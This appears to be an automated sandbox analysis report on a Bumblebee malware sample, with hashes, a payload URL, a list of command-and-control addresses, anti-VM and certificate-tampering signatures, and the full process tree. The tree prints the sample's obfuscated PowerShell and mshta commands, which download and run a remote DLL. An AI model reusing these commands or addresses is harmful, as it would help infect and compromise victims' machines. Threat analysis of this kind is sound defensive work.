Analysis
-
max time kernel
95s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
18/06/2022, 03:26
Static task
static1
Behavioral task
behavioral1
Sample
8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip
Resource
win7-20220414-en
General
-
Target
8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip
-
Size
3.1MB
-
MD5
a515d83b2794491048040a28d85fe75d
-
SHA1
fddb57bedf443d63f57d39e8dc0f07c9c520f8e2
-
SHA256
8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588
-
SHA512
f684bea03072dfc1c9cfb44ca5c63bbccb0a897d0b4ed59f0fcf4005eaa901d1143aca68b77544e748526a346879ecb0d988469ef3bac6bef7219aa14bc550b7
Malware Config
Extracted
https://pidipurev.com/a1799.hta
Extracted
bumblebee
a17
220.111.119.123:476
90.12.112.169:180
146.70.124.116:443
47.27.63.45:115
77.45.24.148:444
11.1.201.27:344
224.200.37.92:481
103.175.16.38:443
188.8.220.88:269
12.202.229.195:440
41.56.181.200:486
173.171.60.50:394
5.152.80.211:121
88.158.143.245:189
57.242.85.233:131
30.205.76.70:490
45.138.172.246:443
213.226.100.95:443
46.44.240.53:361
151.75.118.144:368
124.77.203.104:343
12.115.36.174:276
239.245.67.55:401
102.51.3.25:432
64.131.183.17:402
246.126.195.66:313
185.62.56.181:443
207.159.38.174:412
171.175.237.53:349
53.74.73.76:297
93.61.106.53:231
243.29.153.81:270
175.187.178.6:302
207.185.174.1:240
251.170.118.186:302
183.90.191.234:276
228.27.113.15:219
83.183.152.159:280
85.239.33.172:443
6.249.22.42:129
45.147.229.199:443
202.123.74.131:227
55.119.41.81:187
14.7.69.141:109
184.198.223.201:113
194.123.215.252:114
73.235.164.95:474
Signatures
-
Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest rundll32.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rundll32.exe -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions rundll32.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 50 864 mshta.exe 52 864 mshta.exe 54 864 mshta.exe 56 864 mshta.exe 59 396 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation mshta.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Wine rundll32.exe -
Loads dropped DLL 1 IoCs
pid Process 3996 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 836 powershell.exe 836 powershell.exe 836 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe 3996 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeRestorePrivilege 3188 7zG.exe Token: 35 3188 7zG.exe Token: SeSecurityPrivilege 3188 7zG.exe Token: SeSecurityPrivilege 3188 7zG.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 396 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3188 7zG.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 836 wrote to memory of 864 836 powershell.exe 99 PID 836 wrote to memory of 864 836 powershell.exe 99 PID 864 wrote to memory of 396 864 mshta.exe 100 PID 864 wrote to memory of 396 864 mshta.exe 100 PID 396 wrote to memory of 3996 396 powershell.exe 102 PID 396 wrote to memory of 3996 396 powershell.exe 102
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip1⤵PID:1596
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3204
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588\" -spe -an -ai#7zMap29216:208:7zEvent169261⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3188
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $uVOFxPZI = [convert]::FromBase64String('enZr');$SvjOMbNF = [convert]::FromBase64String('XkBbR1ITW0dHQ0AJHBxDWldaQ0ZBVkUdUFxeHFICBAoKHVtHUg==');$OFVQWJMp = -join($uVOFxPZI | % {[char] ($_ -bxor 0x33)});$ZwhCtgVk = -join ($SvjOMbNF | % { [char] ($_ -bxor 0x33)});sal idMJYXuL $OFVQWJMp;idMJYXuL $ZwhCtgVk1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://pidipurev.com/a1799.hta2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function cWJskuQlbOmpMA($ukeBbVmYNH, $EFucjtI){[IO.File]::WriteAllBytes($ukeBbVmYNH, $EFucjtI)};function zyZFKJmgHX($ukeBbVmYNH){if($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68588,68596,68596))) -eq $True){Start-Process (tXhPzTmXMFNFufDI @(rundll32.exe $ukeBbVmYNH ,TSErsNqyhR ))}elseif($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68600,68603,68537))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ukeBbVmYNH}else{Start-Process $ukeBbVmYNH}};function kpcQqRGkdksJXcLvOm($cWJskuQlbOmpMA){$jXeMAsDGusrM=(tXhPzTmXMFNFufDI @(68560,68593,68588,68588,68589,68598));$PlebPQOXHehbVKBBhSo=(Get-ChildItem $cWJskuQlbOmpMA -Force);$PlebPQOXHehbVKBBhSo.Attributes=$PlebPQOXHehbVKBBhSo.Attributes -bor ([IO.FileAttributes]$jXeMAsDGusrM).value__};function CnfznBhFm($qmukbsVTysBgrFlHF){$XovuEuCBHyBHjrpc = New-Object (tXhPzTmXMFNFufDI @(68566,68589,68604,68534,68575,68589,68586,68555,68596,68593,68589,68598,68604));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$EFucjtI = $XovuEuCBHyBHjrpc.DownloadData($qmukbsVTysBgrFlHF);return $EFucjtI};function tXhPzTmXMFNFufDI($cIhrmkNsmwm){$CcKhtridtJs=68488;$mssiUtTLO=$Null;foreach($AMEOxEPSnbDIIHAZ in $cIhrmkNsmwm){$mssiUtTLO+=[char]($AMEOxEPSnbDIIHAZ-$CcKhtridtJs)};return $mssiUtTLO};function wRHQAOwSkVoz(){$DQTYahmqYv = $env:AppData + '\';;$bCCPiHWusHeO = $DQTYahmqYv + '';If(Test-Path -Path $bCCPiHWusHeO){Invoke-Item $bCCPiHWusHeO;}Else{ $eSzamRIZLBTJ = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535));cWJskuQlbOmpMA $bCCPiHWusHeO $eSzamRIZLBTJ;Invoke-Item $bCCPiHWusHeO;}$CRGBhJNKWPuzGc = $DQTYahmqYv + 'a17_cr99.dll'; if (Test-Path -Path $CRGBhJNKWPuzGc){zyZFKJmgHX $CRGBhJNKWPuzGc;}Else{ $FKoBPFKAjO = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535,68600,68593,68588,68593,68600,68605,68602,68589,68606,68534,68587,68599,68597,68535,68585,68537,68543,68583,68587,68602,68545,68545,68534,68588,68596,68596));cWJskuQlbOmpMA $CRGBhJNKWPuzGc $FKoBPFKAjO;zyZFKJmgHX $CRGBhJNKWPuzGc;};kpcQqRGkdksJXcLvOm $CRGBhJNKWPuzGc;;;;;}wRHQAOwSkVoz;3⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a17_cr99.dll TSErsNqyhR4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3996
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5e1fb26de120faadab3c093b78644964f
SHA1bb587dd3b1ad8384b6d612bc4bb806f41562982f
SHA256e1ce351162cae7e8671f980192da54b8440d309985687d8eef56fec0b3180a85
SHA5126e4d18e9506e72f90aea0c93d190b9817566bbbfa2409c1ae6ca98c2b81f8a2bd4204270ce951444d49dfc85c9f1b913952afe6b8fceea918dd97006cf322518
-
C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588\PRD.lnk
Filesize1.9MB
MD56d3b37ea0e22cb04d9227dee552663f4
SHA12e1d39395fc36693d2abff8709db4261909e7cda
SHA2569c4cfd85af061badf6bab38ace88be3a6a21e64fd99571eee8e93fed745261f9
SHA5123089cecd1b4fb2c843aec61f1cb5a28f8c1052c5ff7296301a6702050b0916b847f199bf78134d88bca1797eabfa70721a9d26d425bc50053018954e290302c7
-
Filesize
1.6MB
MD5f72e0a5bc11cf1b2f5446c27e98049dd
SHA1ca695374c77d62cdbd87ef88f3ad646b9e799614
SHA2563d62ffeaa997dd7e6bdfa072e71a47241960524b31b64a168ca59d69ff680437
SHA512ea23b03ed49f4e31e713845357e22f896f07ad5637df71b9e97976cb1c235beb3f30579697a156b477f3b38edc6bc133fe03b5c98754dc102575a7a4679f3825
-
Filesize
1.6MB
MD5f72e0a5bc11cf1b2f5446c27e98049dd
SHA1ca695374c77d62cdbd87ef88f3ad646b9e799614
SHA2563d62ffeaa997dd7e6bdfa072e71a47241960524b31b64a168ca59d69ff680437
SHA512ea23b03ed49f4e31e713845357e22f896f07ad5637df71b9e97976cb1c235beb3f30579697a156b477f3b38edc6bc133fe03b5c98754dc102575a7a4679f3825